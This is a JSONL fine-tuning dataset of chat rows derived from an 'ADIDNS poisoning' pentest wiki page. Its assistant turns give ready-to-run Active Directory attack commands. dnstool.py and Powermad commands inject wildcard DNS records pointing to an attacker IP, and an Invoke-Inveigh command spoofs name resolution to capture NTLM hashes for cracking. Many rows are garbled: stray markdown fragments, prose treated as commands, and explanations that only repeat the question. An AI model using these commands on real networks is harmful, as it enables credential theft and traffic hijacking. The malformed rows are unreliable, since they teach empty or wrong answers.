thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of query a node", "response": "dnstool.py -u 'DOMAIN\\user' -p 'password' --record '*' --action query $DomainController", "metadata": {"corpus_index": 772, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do query a node"}, {"role": "assistant", "content": "dnstool.py -u 'DOMAIN\\user' -p 'password' --record '*' --action query $DomainController"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do query a node", "response": "dnstool.py -u 'DOMAIN\\user' -p 'password' --record '*' --action query $DomainController", "metadata": {"corpus_index": 772, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about add a node and attach a record?"}, {"role": "assistant", "content": "dnstool.py -u 'DOMAIN\\user' -p 'password' --record '*' --action add --data $AttackerIP $DomainController\n``\n\n=== Windows\n\nOn Windows, the Powermad module can be used to manually add, view, edit, enable, disable or remove records and nodes. In the following examples, the wildcard (*) node/record is targeted but the examples should also work with other records (except things like WPAD that are in the GQBL).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about add a node and attach a record?", "response": "dnstool.py -u 'DOMAIN\\user' -p 'password' --record '*' --action add --data $AttackerIP $DomainController\n``\n\n=== Windows\n\nOn Windows, the Powermad module can be used to manually add, view, edit, enable, disable or remove records and nodes. In the following examples, the wildcard (*) node/record is targeted but the examples should also work with other records (except things like WPAD that are in the GQBL).\n\n``bash", "metadata": {"corpus_index": 773, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform add a node and attach a record?"}, {"role": "assistant", "content": "dnstool.py -u 'DOMAIN\\user' -p 'password' --record '*' --action add --data $AttackerIP $DomainController\n``\n\n=== Windows\n\nOn Windows, the Powermad module can be used to manually add, view, edit, enable, disable or remove records and nodes. In the following examples, the wildcard (*) node/record is targeted but the examples should also work with other records (except things like WPAD that are in the GQBL).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform add a node and attach a record?", "response": "dnstool.py -u 'DOMAIN\\user' -p 'password' --record '*' --action add --data $AttackerIP $DomainController\n``\n\n=== Windows\n\nOn Windows, the Powermad module can be used to manually add, view, edit, enable, disable or remove records and nodes. In the following examples, the wildcard (*) node/record is targeted but the examples should also work with other records (except things like WPAD that are in the GQBL).\n\n``bash", "metadata": {"corpus_index": 773, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for add a node and attach a record"}, {"role": "assistant", "content": "=== Windows\n\nOn Windows, the [Powermad ](https://github.com/Kevin-Robertson/Powermad)module can be used to manually add, view, edit, enable, disable or remove records and nodes. In the following examples, the wildcard (`*`) node/record is targeted but the examples should also work with other records (except things like `WPAD` that are in the [GQBL](wpad-spoofing.md#through-adidns-spoofing))."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for add a node and attach a record", "response": "=== Windows\n\nOn Windows, the [Powermad ](https://github.com/Kevin-Robertson/Powermad)module can be used to manually add, view, edit, enable, disable or remove records and nodes. In the following examples, the wildcard (`*`) node/record is targeted but the examples should also work with other records (except things like `WPAD` that are in the [GQBL](wpad-spoofing.md#through-adidns-spoofing)).", "metadata": {"corpus_index": 774, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for add a node and attach a record. add a node and attach a record"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for add a node and attach a record. add a node and attach a record", "metadata": {"corpus_index": 774, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about get the value populated in the DNSRecord attribute of a node?"}, {"role": "assistant", "content": "Get-ADIDNSNodeAttribute -Node * -Attribute DNSRecord"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about get the value populated in the DNSRecord attribute of a node?", "response": "Get-ADIDNSNodeAttribute -Node * -Attribute DNSRecord", "metadata": {"corpus_index": 775, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through get the value populated in the DNSRecord attribute of a node"}, {"role": "assistant", "content": "Get-ADIDNSNodeAttribute -Node * -Attribute DNSRecord"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through get the value populated in the DNSRecord attribute of a node", "response": "Get-ADIDNSNodeAttribute -Node * -Attribute DNSRecord", "metadata": {"corpus_index": 775, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does creates a wildcard record, sets the DNSRecord and DNSTombstoned attributes work?"}, {"role": "assistant", "content": "New-ADIDNSNode -Tombstone -Verbose -Node * -Data $ATTACKER_IP"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does creates a wildcard record, sets the DNSRecord and DNSTombstoned attributes work?", "response": "New-ADIDNSNode -Tombstone -Verbose -Node * -Data $ATTACKER_IP", "metadata": {"corpus_index": 776, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out creates a wildcard record, sets the DNSRecord and DNSTombstoned attributes during a pentest?"}, {"role": "assistant", "content": "New-ADIDNSNode -Tombstone -Verbose -Node * -Data $ATTACKER_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out creates a wildcard record, sets the DNSRecord and DNSTombstoned attributes during a pentest?", "response": "New-ADIDNSNode -Tombstone -Verbose -Node * -Data $ATTACKER_IP", "metadata": {"corpus_index": 776, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about append, populate, or overwrite values in a DNS node attribute"}, {"role": "assistant", "content": "Set-ADIDNSNodeAttribute -Node * -Attribute DNSRecord -Value (New-DNSRecordArray -Data $ATTACKER_IP) -Verbose"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about append, populate, or overwrite values in a DNS node attribute", "response": "Set-ADIDNSNodeAttribute -Node * -Attribute DNSRecord -Value (New-DNSRecordArray -Data $ATTACKER_IP) -Verbose", "metadata": {"corpus_index": 777, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform append, populate, or overwrite values in a DNS node attribute?"}, {"role": "assistant", "content": "Set-ADIDNSNodeAttribute -Node * -Attribute DNSRecord -Value (New-DNSRecordArray -Data $ATTACKER_IP) -Verbose"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform append, populate, or overwrite values in a DNS node attribute?", "response": "Set-ADIDNSNodeAttribute -Node * -Attribute DNSRecord -Value (New-DNSRecordArray -Data $ATTACKER_IP) -Verbose", "metadata": {"corpus_index": 777, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is check the wildcard record works/resolve a name?"}, {"role": "assistant", "content": "Resolve-DnsName NameThatDoesntExist\n``\n\nAlternatively, the Invoke-PassTheCert fork can also be used to query DnsRecords, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is check the wildcard record works/resolve a name?", "response": "Resolve-DnsName NameThatDoesntExist\n``\n\nAlternatively, the Invoke-PassTheCert fork can also be used to query DnsRecords, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 778, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for check the wildcard record works/resolve a name"}, {"role": "assistant", "content": "Resolve-DnsName NameThatDoesntExist\n``\n\nAlternatively, the Invoke-PassTheCert fork can also be used to query DnsRecords, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for check the wildcard record works/resolve a name", "response": "Resolve-DnsName NameThatDoesntExist\n``\n\nAlternatively, the Invoke-PassTheCert fork can also be used to query DnsRecords, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 778, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do check the wildcard record works/resolve a name"}, {"role": "assistant", "content": "Alternatively, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can also be used to query DnsRecords, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do check the wildcard record works/resolve a name", "response": "Alternatively, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can also be used to query DnsRecords, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).\n\n> Note: the [README](https://github.com/jamarir/Invoke-PassTheCert/blob/main/README.md) contains the methodology to request a certificate using [certreq](https://github.com/GhostPack/Certify/issues/13#issuecomment-3622538862) from Windows (with a password, or an NTHash).", "metadata": {"corpus_index": 779, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Alternatively, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can also be used to query DnsRecords, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).`?"}, {"role": "assistant", "content": "This command is used for check the wildcard record works/resolve a name. check the wildcard record works/resolve a name"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Alternatively, the [Invoke-PassTheCert](https://github.com/jamarir/Invoke-PassTheCert) fork can also be used to query DnsRecords, authenticating through Schannel via [PassTheCert](https://www.thehacker.recipes/ad/movement/schannel/passthecert) (PowerShell version).`?", "response": "This command is used for check the wildcard record works/resolve a name. check the wildcard record works/resolve a name", "metadata": {"corpus_index": 779, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Enumerates all DnsRecords within the 'ADLAB.LOCAL' domain?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'DnsRecords' -SearchBase 'DC=ADLAB,DC=LOCAL'\n``\n\n> [!SUCCESS]\n> TL; DR: the following command will add a new wildcard record (if it doesn't already exist) with the attacker IP set in the DNSRecord attribute\n> \n> `bash\n> New-ADIDNSNode -Tombstone -Verbose -Node * -Data $ATTACKER_IP\n> `\n\n> [!CAUTION]\n> Warning: in some environments, the disabling or removal of the records previously created for tests failed. The records were shown as tombstoned or nonexistant when using functions like Get-ADIDNSNodeOwner, Get-ADIDNSNodeAttribute, and so on. I think it was due to some replication issues.\n> \n> However, the DNS Manager console was still showing those records and name resolution was still effective. It will probably stay an unsolved mystery for me, but testers need to keep this in mind when abusing ADIDNS.\n\nMore help on usage, support functions, parameters and attacks here.\n\n:::\n\n> [!TIP]\n> When adding records has no impact on name resolution or when the tools throw errors like NoSuchObject, it could be that the DNS zones in use are stored in the legacy System partition, or the ForestDnsZones, instead of the DomainDnsZones one.\n> \n> This can be set with the --legacy or --forest option on dnstool.py, or with the -Partition` argument for Powermad."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Enumerates all DnsRecords within the 'ADLAB.LOCAL' domain?", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'DnsRecords' -SearchBase 'DC=ADLAB,DC=LOCAL'\n``\n\n> [!SUCCESS]\n> TL; DR: the following command will add a new wildcard record (if it doesn't already exist) with the attacker IP set in the DNSRecord attribute\n> \n> `bash\n> New-ADIDNSNode -Tombstone -Verbose -Node * -Data $ATTACKER_IP\n> `\n\n> [!CAUTION]\n> Warning: in some environments, the disabling or removal of the records previously created for tests failed. The records were shown as tombstoned or nonexistant when using functions like Get-ADIDNSNodeOwner, Get-ADIDNSNodeAttribute, and so on. I think it was due to some replication issues.\n> \n> However, the DNS Manager console was still showing those records and name resolution was still effective. It will probably stay an unsolved mystery for me, but testers need to keep this in mind when abusing ADIDNS.\n\nMore help on usage, support functions, parameters and attacks here.\n\n:::\n\n> [!TIP]\n> When adding records has no impact on name resolution or when the tools throw errors like NoSuchObject, it could be that the DNS zones in use are stored in the legacy System partition, or the ForestDnsZones, instead of the DomainDnsZones one.\n> \n> This can be set with the --legacy or --forest option on dnstool.py, or with the -Partition` argument for Powermad.", "metadata": {"corpus_index": 780, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Enumerates all DnsRecords within the 'ADLAB.LOCAL' domain"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'DnsRecords' -SearchBase 'DC=ADLAB,DC=LOCAL'\n``\n\n> [!SUCCESS]\n> TL; DR: the following command will add a new wildcard record (if it doesn't already exist) with the attacker IP set in the DNSRecord attribute\n> \n> `bash\n> New-ADIDNSNode -Tombstone -Verbose -Node * -Data $ATTACKER_IP\n> `\n\n> [!CAUTION]\n> Warning: in some environments, the disabling or removal of the records previously created for tests failed. The records were shown as tombstoned or nonexistant when using functions like Get-ADIDNSNodeOwner, Get-ADIDNSNodeAttribute, and so on. I think it was due to some replication issues.\n> \n> However, the DNS Manager console was still showing those records and name resolution was still effective. It will probably stay an unsolved mystery for me, but testers need to keep this in mind when abusing ADIDNS.\n\nMore help on usage, support functions, parameters and attacks here.\n\n:::\n\n> [!TIP]\n> When adding records has no impact on name resolution or when the tools throw errors like NoSuchObject, it could be that the DNS zones in use are stored in the legacy System partition, or the ForestDnsZones, instead of the DomainDnsZones one.\n> \n> This can be set with the --legacy or --forest option on dnstool.py, or with the -Partition` argument for Powermad."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Enumerates all DnsRecords within the 'ADLAB.LOCAL' domain", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'DnsRecords' -SearchBase 'DC=ADLAB,DC=LOCAL'\n``\n\n> [!SUCCESS]\n> TL; DR: the following command will add a new wildcard record (if it doesn't already exist) with the attacker IP set in the DNSRecord attribute\n> \n> `bash\n> New-ADIDNSNode -Tombstone -Verbose -Node * -Data $ATTACKER_IP\n> `\n\n> [!CAUTION]\n> Warning: in some environments, the disabling or removal of the records previously created for tests failed. The records were shown as tombstoned or nonexistant when using functions like Get-ADIDNSNodeOwner, Get-ADIDNSNodeAttribute, and so on. I think it was due to some replication issues.\n> \n> However, the DNS Manager console was still showing those records and name resolution was still effective. It will probably stay an unsolved mystery for me, but testers need to keep this in mind when abusing ADIDNS.\n\nMore help on usage, support functions, parameters and attacks here.\n\n:::\n\n> [!TIP]\n> When adding records has no impact on name resolution or when the tools throw errors like NoSuchObject, it could be that the DNS zones in use are stored in the legacy System partition, or the ForestDnsZones, instead of the DomainDnsZones one.\n> \n> This can be set with the --legacy or --forest option on dnstool.py, or with the -Partition` argument for Powermad.", "metadata": {"corpus_index": 780, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about ADIDNS poisoning - Dynamic spoofing?"}, {"role": "assistant", "content": "Using Inveigh (Powershell), the following command will \n\n* operate LLMNR, NBT-NS and mDNS spoofing\n* operate ADIDNS spoofing\n * combo looks at LLMNR/NBNS requests and adds a record to DNS if the same request is received from multiple systems\n * ns injects an NS record and if needed, a target record. This is primarily for the GQBL bypass for wpad. \n * wildcard injects a wildcard record\n* set the threshold at which the combo ADIDNS spoofing mode will take effect\n* enable showing NTLM challenge/response captures from machine accounts\n* set the Challenge to 1122334455667788 (to crack NTLM hashes with crack.sh)\n\n``powershell\nInvoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y\n`\n\nThis wiki page can be really useful to help master Inveigh and its support functions\n\n* Clear-Inveigh to clear Inveigh's hashtable\n* Get-Inveigh to get data from Inveigh's hashtable\n* Stop-Inveigh to stop all running modules\n* Watch-Inveigh` to enable real time console output"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about ADIDNS poisoning - Dynamic spoofing?", "response": "Using Inveigh (Powershell), the following command will \n\n* operate LLMNR, NBT-NS and mDNS spoofing\n* operate ADIDNS spoofing\n * combo looks at LLMNR/NBNS requests and adds a record to DNS if the same request is received from multiple systems\n * ns injects an NS record and if needed, a target record. This is primarily for the GQBL bypass for wpad. \n * wildcard injects a wildcard record\n* set the threshold at which the combo ADIDNS spoofing mode will take effect\n* enable showing NTLM challenge/response captures from machine accounts\n* set the Challenge to 1122334455667788 (to crack NTLM hashes with crack.sh)\n\n``powershell\nInvoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y\n`\n\nThis wiki page can be really useful to help master Inveigh and its support functions\n\n* Clear-Inveigh to clear Inveigh's hashtable\n* Get-Inveigh to get data from Inveigh's hashtable\n* Stop-Inveigh to stop all running modules\n* Watch-Inveigh` to enable real time console output", "metadata": {"corpus_index": 781, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on ADIDNS poisoning - Dynamic spoofing"}, {"role": "assistant", "content": "Using Inveigh (Powershell), the following command will \n\n* operate LLMNR, NBT-NS and mDNS spoofing\n* operate ADIDNS spoofing\n * combo looks at LLMNR/NBNS requests and adds a record to DNS if the same request is received from multiple systems\n * ns injects an NS record and if needed, a target record. This is primarily for the GQBL bypass for wpad. \n * wildcard injects a wildcard record\n* set the threshold at which the combo ADIDNS spoofing mode will take effect\n* enable showing NTLM challenge/response captures from machine accounts\n* set the Challenge to 1122334455667788 (to crack NTLM hashes with crack.sh)\n\n``powershell\nInvoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y\n`\n\nThis wiki page can be really useful to help master Inveigh and its support functions\n\n* Clear-Inveigh to clear Inveigh's hashtable\n* Get-Inveigh to get data from Inveigh's hashtable\n* Stop-Inveigh to stop all running modules\n* Watch-Inveigh` to enable real time console output"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on ADIDNS poisoning - Dynamic spoofing", "response": "Using Inveigh (Powershell), the following command will \n\n* operate LLMNR, NBT-NS and mDNS spoofing\n* operate ADIDNS spoofing\n * combo looks at LLMNR/NBNS requests and adds a record to DNS if the same request is received from multiple systems\n * ns injects an NS record and if needed, a target record. This is primarily for the GQBL bypass for wpad. \n * wildcard injects a wildcard record\n* set the threshold at which the combo ADIDNS spoofing mode will take effect\n* enable showing NTLM challenge/response captures from machine accounts\n* set the Challenge to 1122334455667788 (to crack NTLM hashes with crack.sh)\n\n``powershell\nInvoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y\n`\n\nThis wiki page can be really useful to help master Inveigh and its support functions\n\n* Clear-Inveigh to clear Inveigh's hashtable\n* Get-Inveigh to get data from Inveigh's hashtable\n* Stop-Inveigh to stop all running modules\n* Watch-Inveigh` to enable real time console output", "metadata": {"corpus_index": 781, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Invoke-Inveigh command to adidns poisoning - dynamic spoofing"}, {"role": "assistant", "content": "Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Invoke-Inveigh command to adidns poisoning - dynamic spoofing", "response": "Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y", "metadata": {"corpus_index": 782, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Invoke-Inveigh"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform ADIDNS poisoning - Dynamic spoofing?"}, {"role": "assistant", "content": "Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y 